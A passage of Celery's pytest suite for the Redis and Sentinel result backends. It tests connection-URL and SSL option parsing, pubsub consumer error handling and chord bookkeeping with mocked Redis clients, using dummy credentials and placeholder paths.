instance not initialized - exception would be raised # when calling .close() consumer._pubsub = None parent_method.reset_mock() consumer.backend.client.connection_pool.reset.reset_mock() consumer.on_after_fork() parent_method.assert_called_once() consumer.backend.client.connection_pool.reset.assert_called_once() # Continues on KeyError consumer._pubsub = Mock() consumer._pubsub.close = Mock(side_effect=KeyError) parent_method.reset_mock() consumer.backend.client.connection_pool.reset.reset_mock() consumer.on_after_fork() parent_method.assert_called_once() @patch('celery.backends.redis.ResultConsumer.cancel_for') @patch('celery.backends.asynchronous.BaseResultConsumer.on_state_change') def test_on_state_change(self, parent_method, cancel_for): consumer = self.get_consumer() meta = {'task_id': 'testing', 'status': states.SUCCESS} message = 'hello' consumer.on_state_change(meta, message) parent_method.assert_called_once_with(meta, message) cancel_for.assert_called_once_with(meta['task_id']) # Does not call cancel_for for other states meta = {'task_id': 'testing2', 'status': states.PENDING} parent_method.reset_mock() cancel_for.reset_mock() consumer.on_state_change(meta, message) parent_method.assert_called_once_with(meta, message) cancel_for.assert_not_called() def test_drain_events_before_start(self): consumer = self.get_consumer() # drain_events shouldn't crash when called before start consumer.drain_events(0.001) def test_consume_from_connection_error(self): consumer = self.get_consumer() consumer.start('initial') consumer._pubsub.subscribe.side_effect = (ConnectionError(), None) consumer.consume_from('some-task') assert consumer._pubsub._subscribed_to == {b'celery-task-meta-initial', b'celery-task-meta-some-task'} def test_cancel_for_connection_error(self): consumer = self.get_consumer() consumer.start('initial') consumer._pubsub.unsubscribe.side_effect = ConnectionError() consumer.consume_from('some-task') consumer.cancel_for('some-task') assert consumer._pubsub._subscribed_to == {b'celery-task-meta-initial'} @patch('celery.backends.redis.ResultConsumer.cancel_for') @patch('celery.backends.asynchronous.BaseResultConsumer.on_state_change') def test_drain_events_connection_error(self, parent_on_state_change, cancel_for): meta = {'task_id': 'initial', 'status': states.SUCCESS} consumer = self.get_consumer() consumer.start('initial') consumer.backend._set_with_state(b'celery-task-meta-initial', json.dumps(meta), states.SUCCESS) consumer._pubsub.get_message.side_effect = ConnectionError() consumer.drain_events() parent_on_state_change.assert_called_with(meta, None) assert consumer._pubsub._subscribed_to == {b'celery-task-meta-initial'} def test_drain_events_connection_error_no_patch(self): meta = {'task_id': 'initial', 'status': states.SUCCESS} consumer = self.get_consumer() consumer.start('initial') consumer.backend._set_with_state(b'celery-task-meta-initial', json.dumps(meta), states.SUCCESS) consumer._pubsub.get_message.side_effect = ConnectionError() consumer.drain_events() consumer._pubsub.subscribe.assert_not_called() class basetest_RedisBackend: def get_backend(self): from celery.backends.redis import RedisBackend class _RedisBackend(RedisBackend): redis = redis return _RedisBackend def get_E_LOST(self): from celery.backends.redis import E_LOST return E_LOST def create_task(self, i, group_id="group_id"): tid = uuid() task = Mock(name=f'task-{tid}') task.name = 'foobarbaz' self.app.tasks['foobarbaz'] = task task.request.chord = signature(task) task.request.id = tid self.b.set_chord_size(group_id, 10) task.request.group = group_id task.request.group_index = i return task @contextmanager def chord_context(self, size=1): with patch('celery.backends.redis.maybe_signature') as ms: request = Mock(name='request') request.id = 'id1' group_id = 'gid1' request.group = group_id request.group_index = None tasks = [ self.create_task(i, group_id=request.group) for i in range(size) ] callback = ms.return_value = Signature('add') callback.id = 'id1' self.b.set_chord_size(group_id, size) callback.delay = Mock(name='callback.delay') yield tasks, request, callback def setup(self): self.Backend = self.get_backend() self.E_LOST = self.get_E_LOST() self.b = self.Backend(app=self.app) class test_RedisBackend(basetest_RedisBackend): @pytest.mark.usefixtures('depends_on_current_app') def test_reduce(self): pytest.importorskip('redis') from celery.backends.redis import RedisBackend x = RedisBackend(app=self.app) assert loads(dumps(x)) def test_no_redis(self): self.Backend.redis = None with pytest.raises(ImproperlyConfigured): self.Backend(app=self.app) def test_username_password_from_redis_conf(self): self.app.conf.redis_password = 'password' x = self.Backend(app=self.app) assert x.connparams assert 'username' not in x.connparams assert x.connparams['password'] == 'password' self.app.conf.redis_username = 'username' x = self.Backend(app=self.app) assert x.connparams assert x.connparams['username'] == 'username' assert x.connparams['password'] == 'password' def test_url(self): self.app.conf.redis_socket_timeout = 30.0 self.app.conf.redis_socket_connect_timeout = 100.0 x = self.Backend( 'redis://:bosco@vandelay.com:123//1', app=self.app, ) assert x.connparams assert x.connparams['host'] == 'vandelay.com' assert x.connparams['db'] == 1 assert x.connparams['port'] == 123 assert x.connparams['password'] == 'bosco' assert x.connparams['socket_timeout'] == 30.0 assert x.connparams['socket_connect_timeout'] == 100.0 assert 'username' not in x.connparams x = self.Backend( 'redis://username:bosco@vandelay.com:123//1', app=self.app, ) assert x.connparams assert x.connparams['host'] == 'vandelay.com' assert x.connparams['db'] == 1 assert x.connparams['port'] == 123 assert x.connparams['username'] == 'username' assert x.connparams['password'] == 'bosco' assert x.connparams['socket_timeout'] == 30.0 assert x.connparams['socket_connect_timeout'] == 100.0 def test_timeouts_in_url_coerced(self): pytest.importorskip('redis') x = self.Backend( ('redis://:bosco@vandelay.com:123//1?' 'socket_timeout=30&socket_connect_timeout=100'), app=self.app, ) assert x.connparams assert x.connparams['host'] == 'vandelay.com' assert x.connparams['db'] == 1 assert x.connparams['port'] == 123 assert x.connparams['password'] == 'bosco' assert x.connparams['socket_timeout'] == 30 assert x.connparams['socket_connect_timeout'] == 100 def test_socket_url(self): pytest.importorskip('redis') self.app.conf.redis_socket_timeout = 30.0 self.app.conf.redis_socket_connect_timeout = 100.0 x = self.Backend( 'socket:///tmp/redis.sock?virtual_host=/3', app=self.app, ) assert x.connparams assert x.connparams['path'] == '/tmp/redis.sock' assert (x.connparams['connection_class'] is redis.UnixDomainSocketConnection) assert 'host' not in x.connparams assert 'port' not in x.connparams assert x.connparams['socket_timeout'] == 30.0 assert 'socket_connect_timeout' not in x.connparams assert 'socket_keepalive' not in x.connparams assert x.connparams['db'] == 3 def test_backend_ssl(self): pytest.importorskip('redis') self.app.conf.redis_backend_use_ssl = { 'ssl_cert_reqs': ssl.CERT_REQUIRED, 'ssl_ca_certs': '/path/to/ca.crt', 'ssl_certfile': '/path/to/client.crt', 'ssl_keyfile': '/path/to/client.key', } self.app.conf.redis_socket_timeout = 30.0 self.app.conf.redis_socket_connect_timeout = 100.0 x = self.Backend( 'rediss://:bosco@vandelay.com:123//1', app=self.app, ) assert x.connparams assert x.connparams['host'] == 'vandelay.com' assert x.connparams['db'] == 1 assert x.connparams['port'] == 123 assert x.connparams['password'] == 'bosco' assert x.connparams['socket_timeout'] == 30.0 assert x.connparams['socket_connect_timeout'] == 100.0 assert x.connparams['ssl_cert_reqs'] == ssl.CERT_REQUIRED assert x.connparams['ssl_ca_certs'] == '/path/to/ca.crt' assert x.connparams['ssl_certfile'] == '/path/to/client.crt' assert x.connparams['ssl_keyfile'] == '/path/to/client.key' from redis.connection import SSLConnection assert x.connparams['connection_class'] is SSLConnection def test_backend_health_check_interval_ssl(self): pytest.importorskip('redis') self.app.conf.redis_backend_use_ssl = { 'ssl_cert_reqs': ssl.CERT_REQUIRED, 'ssl_ca_certs': '/path/to/ca.crt', 'ssl_certfile': '/path/to/client.crt', 'ssl_keyfile': '/path/to/client.key', } self.app.conf.redis_backend_health_check_interval = 10 x = self.Backend( 'rediss://:bosco@vandelay.com:123//1', app=self.app, ) assert x.connparams assert x.connparams['host'] == 'vandelay.com' assert x.connparams['db'] == 1 assert x.connparams['port'] == 123 assert x.connparams['password'] == 'bosco' assert x.connparams['health_check_interval'] == 10 from redis.connection import SSLConnection assert x.connparams['connection_class'] is SSLConnection def test_backend_health_check_interval(self): pytest.importorskip('redis') self.app.conf.redis_backend_health_check_interval = 10 x = self.Backend( 'redis://vandelay.com:123//1', app=self.app, ) assert x.connparams assert x.connparams['host'] == 'vandelay.com' assert x.connparams['db'] == 1 assert x.connparams['port'] == 123 assert x.connparams['health_check_interval'] == 10 def test_backend_health_check_interval_not_set(self): pytest.importorskip('redis') x = self.Backend( 'redis://vandelay.com:123//1', app=self.app, ) assert x.connparams assert x.connparams['host'] == 'vandelay.com' assert x.connparams['db'] == 1 assert x.connparams['port'] == 123 assert "health_check_interval" not in x.connparams @pytest.mark.parametrize('cert_str', [ "required", "CERT_REQUIRED", ]) def test_backend_ssl_certreq_str(self, cert_str): pytest.importorskip('redis') self.app.conf.redis_backend_use_ssl = { 'ssl_cert_reqs': cert_str, 'ssl_ca_certs': '/path/to/ca.crt', 'ssl_certfile': '/path/to/client.crt', 'ssl_keyfile': '/path/to/client.key', } self.app.conf.redis_socket_timeout = 30.0 self.app.conf.redis_socket_connect_timeout = 100.0 x = self.Backend( 'rediss://:bosco@vandelay.com:123//1', app=self.app, ) assert x.connparams assert x.connparams['host'] == 'vandelay.com' assert x.connparams['db'] == 1 assert x.connparams['port'] == 123 assert x.connparams['password'] == 'bosco' assert x.connparams['socket_timeout'] == 30.0 assert x.connparams['socket_connect_timeout'] == 100.0 assert x.connparams['ssl_cert_reqs'] == ssl.CERT_REQUIRED assert x.connparams['ssl_ca_certs'] == '/path/to/ca.crt' assert x.connparams['ssl_certfile'] == '/path/to/client.crt' assert x.connparams['ssl_keyfile'] == '/path/to/client.key' from redis.connection import SSLConnection assert x.connparams['connection_class'] is SSLConnection @pytest.mark.parametrize('cert_str', [ "required", "CERT_REQUIRED", ]) def test_backend_ssl_url(self, cert_str): pytest.importorskip('redis') self.app.conf.redis_socket_timeout = 30.0 self.app.conf.redis_socket_connect_timeout = 100.0 x = self.Backend( 'rediss://:bosco@vandelay.com:123//1?ssl_cert_reqs=%s' % cert_str, app=self.app, ) assert x.connparams assert x.connparams['host'] == 'vandelay.com' assert x.connparams['db'] == 1 assert x.connparams['port'] == 123 assert x.connparams['password'] == 'bosco' assert x.connparams['socket_timeout'] == 30.0 assert x.connparams['socket_connect_timeout'] == 100.0 assert x.connparams['ssl_cert_reqs'] == ssl.CERT_REQUIRED from redis.connection import SSLConnection assert x.connparams['connection_class'] is SSLConnection @pytest.mark.parametrize('cert_str', [ "none", "CERT_NONE", ]) def test_backend_ssl_url_options(self, cert_str): pytest.importorskip('redis') x = self.Backend( ( 'rediss://:bosco@vandelay.com:123//1' '?ssl_cert_reqs={cert_str}' '&ssl_ca_certs=%2Fvar%2Fssl%2Fmyca.pem' '&ssl_certfile=%2Fvar%2Fssl%2Fredis-server-cert.pem' '&ssl_keyfile=%2Fvar%2Fssl%2Fprivate%2Fworker-key.pem' ).format(cert_str=cert_str), app=self.app, ) assert x.connparams assert x.connparams['host'] == 'vandelay.com' assert x.connparams['db'] == 1 assert x.connparams['port'] == 123 assert x.connparams['password'] == 'bosco' assert x.connparams['ssl_cert_reqs'] == ssl.CERT_NONE assert x.connparams['ssl_ca_certs'] == '/var/ssl/myca.pem' assert x.connparams['ssl_certfile'] == '/var/ssl/redis-server-cert.pem' assert x.connparams['ssl_keyfile'] == '/var/ssl/private/worker-key.pem' @pytest.mark.parametrize('cert_str', [ "optional", "CERT_OPTIONAL", ]) def test_backend_ssl_url_cert_none(self, cert_str): pytest.importorskip('redis') x = self.Backend( 'rediss://:bosco@vandelay.com:123//1?ssl_cert_reqs=%s' % cert_str, app=self.app, ) assert x.connparams assert x.connparams['host'] == 'vandelay.com' assert x.connparams['db'] == 1 assert x.connparams['port'] == 123 assert x.connparams['ssl_cert_reqs'] == ssl.CERT_OPTIONAL from redis.connection import SSLConnection assert x.connparams['connection_class'] is SSLConnection @pytest.mark.parametrize("uri", [ 'rediss://:bosco@vandelay.com:123//1?ssl_cert_reqs=CERT_KITTY_CATS', 'rediss://:bosco@vandelay.com:123//1' ]) def test_backend_ssl_url_invalid(self, uri): pytest.importorskip('redis') with pytest.raises(ValueError): self.Backend( uri, app=self.app, ) def test_conf_raises_KeyError(self): self.app.conf = AttributeDict({ 'result_serializer': 'json', 'result_cache_max': 1, 'result_expires': None, 'accept_content': ['json'], 'result_accept_content': ['json'], }) self.Backend(app=self.app) @patch('celery.backends.redis.logger') def test_on_connection_error(self, logger): intervals = iter([10, 20, 30]) exc = KeyError() assert self.b.on_connection_error(None, exc, intervals, 1) == 10 logger.error.assert_called_with( self.E_LOST, 1, 'Inf', 'in 10.00 seconds') assert self.b.on_connection_error(10, exc, intervals, 2) == 20 logger.error.assert_called_with(self.E_LOST, 2, 10, 'in 20.00 seconds') assert self.b.on_connection_error(10, exc, intervals, 3) == 30 logger.error.assert_called_with(self.E_LOST, 3, 10, 'in 30.00 seconds') @patch('celery.backends.redis.retry_over_time') def test_retry_policy_conf(self, retry_over_time): self.app.conf.result_backend_transport_options = dict( retry_policy=dict( max_retries=2, interval_start=0, interval_step=0.01, ), ) b = self.Backend(app=self.app) def fn(): return 1 # We don't want to re-test retry_over_time, just check we called it # with the expected args b.ensure(fn, (),) retry_over_time.assert_called_with( fn, b.connection_errors, (), {}, ANY, max_retries=2, interval_start=0, interval_step=0.01, interval_max=1 ) def test_incr(self): self.b.client = Mock(name='client') self.b.incr('foo') self.b.client.incr.assert_called_with('foo') def test_expire(self): self.b.client = Mock(name='client') self.b.expire('foo', 300) self.b.client.expire.assert_called_with('foo', 300) def test_apply_chord(self, unlock='celery.chord_unlock'): self.app.tasks[unlock] = Mock() header_result_args = ( uuid(), [self.app.AsyncResult(x) for x in range(3)], ) self.b.apply_chord(header_result_args, None) assert self.app.tasks[unlock].apply_async.call_count == 0 def test_unpack_chord_result(self): self.b.exception_to_python = Mock(name='etp') decode = Mock(name='decode') exc = KeyError() tup = decode.return_value = (1, 'id1', states.FAILURE, exc) with pytest.raises(ChordError): self.b._unpack_chord_result(tup, decode) decode.assert_called_with(tup) self.b.exception_to_python.assert_called_with(exc) exc = ValueError() tup = decode.return_value = (2, 'id2', states.RETRY, exc) ret = self.b._unpack_chord_result(tup, decode) self.b.exception_to_python.assert_called_with(exc) assert ret is self.b.exception_to_python() def test_on_chord_part_return_no_gid_or_tid(self): request = Mock(name='request') request.id = request.group = request.group_index = None assert self.b.on_chord_part_return(request, 'SUCCESS', 10) is None def test_ConnectionPool(self): self.b.redis = Mock(name='redis') assert self.b._ConnectionPool is None assert self.b.ConnectionPool is self.b.redis.ConnectionPool assert self.b.ConnectionPool is self.b.redis.ConnectionPool def test_expires_defaults_to_config(self): self.app.conf.result_expires = 10 b = self.Backend(expires=None, app=self.app) assert b.expires == 10 def test_expires_is_int(self): b = self.Backend(expires=48, app=self.app) assert b.expires == 48 def test_add_to_chord(self): b = self.Backend('redis://', app=self.app) gid = uuid() b.add_to_chord(gid, 'sig') b.client.incr.assert_called_with(b.get_key_for_group(gid, '.t'), 1) def test_set_chord_size(self): b = self.Backend('redis://', app=self.app) gid = uuid() b.set_chord_size(gid, 10) b.client.set.assert_called_with(b.get_key_for_group(gid, '.s'), 10) def test_expires_is_None(self): b = self.Backend(expires=None, app=self.app) assert b.expires == self.app.conf.result_expires.total_seconds() def test_expires_is_timedelta(self): b = self.Backend(expires=timedelta(minutes=1), app=self.app) assert b.expires == 60 def test_mget(self): assert self.b.mget(['a', 'b', 'c']) self.b.client.mget.assert_called_with(['a', 'b', 'c']) def test_set_no_expire(self): self.b.expires = None self.b._set_with_state('foo', 'bar', states.SUCCESS) def test_process_cleanup(self): self.b.process_cleanup() def test_get_set_forget(self): tid = uuid() self.b.store_result(tid, 42, states.SUCCESS) assert self.b.get_state(tid) == states.SUCCESS assert self.b.get_result(tid) == 42 self.b.forget(tid) assert self.b.get_state(tid) == states.PENDING def test_set_expires(self): self.b = self.Backend(expires=512, app=self.app) tid = uuid() key = self.b.get_key_for_task(tid) self.b.store_result(tid, 42, states.SUCCESS) self.b.client.expire.assert_called_with( key, 512, ) def test_set_raises_error_on_large_value(self): with pytest.raises(BackendStoreError): self.b.set('key', 'x' * (self.b._MAX_STR_VALUE_SIZE + 1)) class test_RedisBackend_chords_simple(basetest_RedisBackend): @pytest.fixture(scope="class", autouse=True) def simple_header_result(self): with patch( "celery.result.GroupResult.restore", return_value=None, ) as p: yield p def test_on_chord_part_return(self): tasks = [self.create_task(i) for i in range(10)] random.shuffle(tasks) for i in range(10): self.b.on_chord_part_return(tasks[i].request, states.SUCCESS, i) assert self.b.client.zadd.call_count self.b.client.zadd.reset_mock() assert self.b.client.zrangebyscore.call_count jkey = self.b.get_key_for_group('group_id', '.j') tkey = self.b.get_key_for_group('group_id', '.t') skey = self.b.get_key_for_group('group_id', '.s') self.b.client.delete.assert_has_calls([call(jkey), call(tkey), call(skey)]) self.b.client.expire.assert_has_calls([ call(jkey, 86400), call(tkey, 86400), call(skey, 86400), ]) def test_on_chord_part_return__unordered(self): self.app.conf.result_backend_transport_options = dict( result_chord_ordered=False, ) tasks = [self.create_task(i) for i in range(10)] random.shuffle(tasks) for i in range(10): self.b.on_chord_part_return(tasks[i].request, states.SUCCESS, i) assert self.b.client.rpush.call_count self.b.client.rpush.reset_mock() assert self.b.client.lrange.call_count jkey = self.b.get_key_for_group('group_id', '.j') tkey = self.b.get_key_for_group('group_id', '.t') self.b.client.delete.assert_has_calls([call(jkey), call(tkey)]) self.b.client.expire.assert_has_calls([ call(jkey, 86400), call(tkey, 86400), ]) def test_on_chord_part_return__ordered(self): self.app.conf.result_backend_transport_options = dict( result_chord_ordered=True, ) tasks = [self.create_task(i) for i in range(10)] random.shuffle(tasks) for i in range(10): self.b.on_chord_part_return(tasks[i].request, states.SUCCESS, i) assert self.b.client.zadd.call_count self.b.client.zadd.reset_mock() assert self.b.client.zrangebyscore.call_count jkey = self.b.get_key_for_group('group_id', '.j') tkey = self.b.get_key_for_group('group_id', '.t') self.b.client.delete.assert_has_calls([call(jkey), call(tkey)]) self.b.client.expire.assert_has_calls([ call(jkey, 86400), call(tkey, 86400), ]) def test_on_chord_part_return_no_expiry(self): old_expires = self.b.expires self.b.expires = None tasks = [self.create_task(i) for i in range(10)] self.b.set_chord_size('group_id', 10) for i in range(10): self.b.on_chord_part_return(tasks[i].request, states.SUCCESS, i) assert self.b.client.zadd.call_count self.b.client.zadd.reset_mock() assert self.b.client.zrangebyscore.call_count jkey = self.b.get_key_for_group('group_id', '.j') tkey = self.b.get_key_for_group('group_id', '.t') self.b.client.delete.assert_has_calls([call(jkey), call(tkey)]) self.b.client.expire.assert_not_called() self.b.expires = old_expires def test_on_chord_part_return_expire_set_to_zero(self): old_expires = self.b.expires self.b.expires = 0 tasks = [self.create_task(i) for i in range(10)] for i in range(10): self.b.on_chord_part_return(tasks[i].request, states.SUCCESS, i) assert self.b.client.zadd.call_count self.b.client.zadd.reset_mock() assert self.b.client.zrangebyscore.call_count jkey = self.b.get_key_for_group('group_id', '.j') tkey = self.b.get_key_for_group('group_id', '.t') self.b.client.delete.assert_has_calls([call(jkey), call(tkey)]) self.b.client.expire.assert_not_called() self.b.expires = old_expires def test_on_chord_part_return_no_expiry__unordered(self): self.app.conf.result_backend_transport_options = dict( result_chord_ordered=False, ) old_expires = self.b.expires self.b.expires = None tasks = [self.create_task(i) for i in range(10)] for i in range(10): self.b.on_chord_part_return(tasks[i].request, states.SUCCESS, i) assert self.b.client.rpush.call_count self.b.client.rpush.reset_mock() assert self.b.client.lrange.call_count jkey = self.b.get_key_for_group('group_id', '.j') tkey = self.b.get_key_for_group('group_id', '.t') self.b.client.delete.assert_has_calls([call(jkey), call(tkey)]) self.b.client.expire.assert_not_called() self.b.expires = old_expires def test_on_chord_part_return_no_expiry__ordered(self): self.app.conf.result_backend_transport_options = dict( result_chord_ordered=True, ) old_expires = self.b.expires self.b.expires = None tasks = [self.create_task(i) for i in range(10)] for i in range(10): self.b.on_chord_part_return(tasks[i].request, states.SUCCESS, i) assert self.b.client.zadd.call_count self.b.client.zadd.reset_mock() assert self.b.client.zrangebyscore.call_count jkey = self.b.get_key_for_group('group_id', '.j') tkey = self.b.get_key_for_group('group_id', '.t') self.b.client.delete.assert_has_calls([call(jkey), call(tkey)]) self.b.client.expire.assert_not_called() self.b.expires = old_expires def test_on_chord_part_return__success(self): with self.chord_context(2) as (_, request, callback): self.b.on_chord_part_return(request, states.SUCCESS, 10) callback.delay.assert_not_called() self.b.on_chord_part_return(request, states.SUCCESS, 20) callback.delay.assert_called_with([10, 20]) def test_on_chord_part_return__success__unordered(self): self.app.conf.result_backend_transport_options = dict( result_chord_ordered=False, ) with self.chord_context(2) as (_, request, callback): self.b.on_chord_part_return(request, states.SUCCESS, 10) callback.delay.assert_not_called() self.b.on_chord_part_return(request, states.SUCCESS, 20) callback.delay.assert_called_with([10, 20]) def test_on_chord_part_return__success__ordered(self): self.app.conf.result_backend_transport_options = dict( result_chord_ordered=True, ) with self.chord_context(2) as (_, request, callback): self.b.on_chord_part_return(request, states.SUCCESS, 10) callback.delay.assert_not_called() self.b.on_chord_part_return(request, states.SUCCESS, 20) callback.delay.assert_called_with([10, 20]) def test_on_chord_part_return__callback_raises(self): with self.chord_context(1) as (_, request, callback): callback.delay.side_effect = KeyError(10) task = self.app._tasks['add'] = Mock(name='add_task') self.b.on_chord_part_return(request, states.SUCCESS, 10) task.backend.fail_from_current_stack.assert_called_with( callback.id, exc=ANY, ) def test_on_chord_part_return__callback_raises__unordered(self): self.app.conf.result_backend_transport_options = dict( result_chord_ordered=False, ) with self.chord_context(1) as (_, request, callback): callback.delay.side_effect = KeyError(10) task = self.app._tasks['add'] = Mock(name='add_task') self.b.on_chord_part_return(request, states.SUCCESS, 10) task.backend.fail_from_current_stack.assert_called_with( callback.id, exc=ANY, ) def test_on_chord_part_return__callback_raises__ordered(self): self.app.conf.result_backend_transport_options = dict( result_chord_ordered=True, ) with self.chord_context(1) as (_, request, callback): callback.delay.side_effect = KeyError(10) task = self.app._tasks['add'] = Mock(name='add_task') self.b.on_chord_part_return(request, states.SUCCESS, 10) task.backend.fail_from_current_stack.assert_called_with( callback.id, exc=ANY, ) def test_on_chord_part_return__ChordError(self): with self.chord_context(1) as (_, request, callback): self.b.client.pipeline = ContextMock() raise_on_second_call(self.b.client.pipeline, ChordError()) self.b.client.pipeline.return_value.zadd().zcount().get().get().expire( ).expire().expire().execute.return_value = (1, 1, 0, b'1', 4, 5, 6) task = self.app._tasks['add'] = Mock(name='add_task') self.b.on_chord_part_return(request, states.SUCCESS, 10) task.backend.fail_from_current_stack.assert_called_with( callback.id, exc=ANY, ) def test_on_chord_part_return__ChordError__unordered(self): self.app.conf.result_backend_transport_options = dict( result_chord_ordered=False, ) with self.chord_context(1) as (_, request, callback): self.b.client.pipeline = ContextMock() raise_on_second_call(self.b.client.pipeline, ChordError()) self.b.client.pipeline.return_value.rpush().llen().get().get().expire( ).expire().expire().execute.return_value = (1, 1, 0, b'1', 4, 5, 6) task = self.app._tasks['add'] = Mock(name='add_task') self.b.on_chord_part_return(request, states.SUCCESS, 10) task.backend.fail_from_current_stack.assert_called_with( callback.id, exc=ANY, ) def test_on_chord_part_return__ChordError__ordered(self): self.app.conf.result_backend_transport_options = dict( result_chord_ordered=True, ) with self.chord_context(1) as (_, request, callback): self.b.client.pipeline = ContextMock() raise_on_second_call(self.b.client.pipeline, ChordError()) self.b.client.pipeline.return_value.zadd().zcount().get().get().expire( ).expire().expire().execute.return_value = (1, 1, 0, b'1', 4, 5, 6) task = self.app._tasks['add'] = Mock(name='add_task') self.b.on_chord_part_return(request, states.SUCCESS, 10) task.backend.fail_from_current_stack.assert_called_with( callback.id, exc=ANY, ) def test_on_chord_part_return__other_error(self): with self.chord_context(1) as (_, request, callback): self.b.client.pipeline = ContextMock() raise_on_second_call(self.b.client.pipeline, RuntimeError()) self.b.client.pipeline.return_value.zadd().zcount().get().get().expire( ).expire().expire().execute.return_value = (1, 1, 0, b'1', 4, 5, 6) task = self.app._tasks['add'] = Mock(name='add_task') self.b.on_chord_part_return(request, states.SUCCESS, 10) task.backend.fail_from_current_stack.assert_called_with( callback.id, exc=ANY, ) def test_on_chord_part_return__other_error__unordered(self): self.app.conf.result_backend_transport_options = dict( result_chord_ordered=False, ) with self.chord_context(1) as (_, request, callback): self.b.client.pipeline = ContextMock() raise_on_second_call(self.b.client.pipeline, RuntimeError()) self.b.client.pipeline.return_value.rpush().llen().get().get().expire( ).expire().expire().execute.return_value = (1, 1, 0, b'1', 4, 5, 6) task = self.app._tasks['add'] = Mock(name='add_task') self.b.on_chord_part_return(request, states.SUCCESS, 10) task.backend.fail_from_current_stack.assert_called_with( callback.id, exc=ANY, ) def test_on_chord_part_return__other_error__ordered(self): self.app.conf.result_backend_transport_options = dict( result_chord_ordered=True, ) with self.chord_context(1) as (_, request, callback): self.b.client.pipeline = ContextMock() raise_on_second_call(self.b.client.pipeline, RuntimeError()) self.b.client.pipeline.return_value.zadd().zcount().get().get().expire( ).expire().expire().execute.return_value = (1, 1, 0, b'1', 4, 5, 6) task = self.app._tasks['add'] = Mock(name='add_task') self.b.on_chord_part_return(request, states.SUCCESS, 10) task.backend.fail_from_current_stack.assert_called_with( callback.id, exc=ANY, ) class test_RedisBackend_chords_complex(basetest_RedisBackend): @pytest.fixture(scope="function", autouse=True) def complex_header_result(self): with patch("celery.result.GroupResult.restore") as p: yield p @pytest.mark.parametrize(['results', 'assert_save_called'], [ # No results in the header at all - won't call `save()` (tuple(), False), # Simple results in the header - won't call `save()` ((AsyncResult("foo"), ), False), # Many simple results in the header - won't call `save()` ((AsyncResult("foo"), ) * 42, False), # A single complex result in the header - will call `save()` ((GroupResult("foo", []),), True), # Many complex results in the header - will call `save()` ((GroupResult("foo"), ) * 42, True), # Mixed simple and complex results in the header - will call `save()` (itertools.islice( itertools.cycle(( AsyncResult("foo"), GroupResult("foo"), )), 42, ), True), ]) def test_apply_chord_complex_header(self, results, assert_save_called): mock_group_result = Mock() mock_group_result.return_value.results = results self.app.GroupResult = mock_group_result header_result_args = ("gid11", results) self.b.apply_chord(header_result_args, None) if assert_save_called: mock_group_result.return_value.save.assert_called_once_with(backend=self.b) else: mock_group_result.return_value.save.assert_not_called() def test_on_chord_part_return_timeout(self, complex_header_result): tasks = [self.create_task(i) for i in range(10)] random.shuffle(tasks) try: self.app.conf.result_chord_join_timeout += 1.0 for task, result_val in zip(tasks, itertools.cycle((42, ))): self.b.on_chord_part_return( task.request, states.SUCCESS, result_val, ) finally: self.app.conf.result_chord_join_timeout -= 1.0 join_func = complex_header_result.return_value.join_native join_func.assert_called_once_with(timeout=4.0, propagate=True) @pytest.mark.parametrize("supports_native_join", (True, False)) def test_on_chord_part_return( self, complex_header_result, supports_native_join, ): mock_result_obj = complex_header_result.return_value mock_result_obj.supports_native_join = supports_native_join tasks = [self.create_task(i) for i in range(10)] random.shuffle(tasks) with self.chord_context(10) as (tasks, request, callback): for task, result_val in zip(tasks, itertools.cycle((42, ))): self.b.on_chord_part_return( task.request, states.SUCCESS, result_val, ) # Confirm that `zadd` was called even though we won't end up # using the data pushed into the sorted set assert self.b.client.zadd.call_count == 1 self.b.client.zadd.reset_mock() # Confirm that neither `zrange` not `lrange` were called self.b.client.zrange.assert_not_called() self.b.client.lrange.assert_not_called() # Confirm that the `GroupResult.restore` mock was called complex_header_result.assert_called_once_with(request.group) # Confirm the the callback was called with the `join()`ed group result if supports_native_join: expected_join = mock_result_obj.join_native else: expected_join = mock_result_obj.join callback.delay.assert_called_once_with(expected_join()) class test_SentinelBackend: def get_backend(self): from celery.backends.redis import SentinelBackend class _SentinelBackend(SentinelBackend): redis = redis sentinel = sentinel return _SentinelBackend def get_E_LOST(self): from celery.backends.redis import E_LOST return E_LOST def setup(self): self.Backend = self.get_backend() self.E_LOST = self.get_E_LOST() self.b = self.Backend(app=self.app) @pytest.mark.usefixtures('depends_on_current_app') def test_reduce(self): pytest.importorskip('redis') from celery.backends.redis import SentinelBackend x = SentinelBackend(app=self.app) assert loads(dumps(x)) def test_no_redis(self): self.Backend.redis = None with pytest.raises(ImproperlyConfigured): self.Backend(app=self.app) def test_url(self): self.app.conf.redis_socket_timeout = 30.0 self.app.conf.redis_socket_connect_timeout = 100.0 x = self.Backend( 'sentinel://:test@github.com:123/1;' 'sentinel://:test@github.com:124/1', app=self.app, ) assert x.connparams assert "host" not in x.connparams assert x.connparams['db'] == 1 assert "port" not in x.connparams assert x.connparams['password'] == "test" assert len(x.connparams['hosts']) == 2 expected_hosts = ["github.com", "github.com"] found_hosts = [cp['host'] for cp in x.connparams['hosts']] assert found_hosts == expected_hosts expected_ports = [123, 124] found_ports = [cp['port'] for cp in x.connparams['hosts']] assert found_ports == expected_ports expected_passwords = ["test", "test"] found_passwords = [cp['password'] for cp in x.connparams['hosts']] assert found_passwords == expected_passwords expected_dbs = [1, 1] found_dbs = [cp['db'] for cp in x.connparams['hosts']] assert found_dbs == expected_dbs # By default passwords should be sanitized display_url = x.as_uri() assert "test" not in display_url # We can choose not to sanitize with the `include_password` argument unsanitized_display_url = x.as_uri(include_password=True) assert unsanitized_display_url == x.url # or to explicitly sanitize forcibly_sanitized_display_url = x.as_uri(include_password=False) assert forcibly_sanitized_display_url == display_url def test_get_sentinel_instance(self): x = self.Backend( 'sentinel://:test@github.com:123/1;' 'sentinel://:test@github.com:124/1', app=self.app, ) sentinel_instance = x._get_sentinel_instance(**x.connparams) assert sentinel_instance.sentinel_kwargs == {} assert sentinel_instance.connection_kwargs['db'] == 1 assert sentinel_instance.connection_kwargs['password'] == "test" assert len(sentinel_instance.sentinels) == 2 def test_get_pool(self): x = self.Backend( 'sentinel://:test@github.com:123/1;' 'sentinel://:test@github.com:124/1', app=self.app, ) pool = x._get_pool(**x.connparams) assert pool def test_backend_ssl(self): pytest.importorskip('redis') from celery.backends.redis import SentinelBackend self.app.conf.redis_backend_use_ssl = { 'ssl_cert_reqs': "CERT_REQUIRED", 'ssl_ca_certs': '/path/to/ca.crt', 'ssl_certfile': '/path/to/client.crt', 'ssl_keyfile': '/path/to/client.key', } self.app.conf.redis_socket_timeout = 30.0 self.app.conf.redis_socket_connect_timeout = 100.0 x = SentinelBackend( 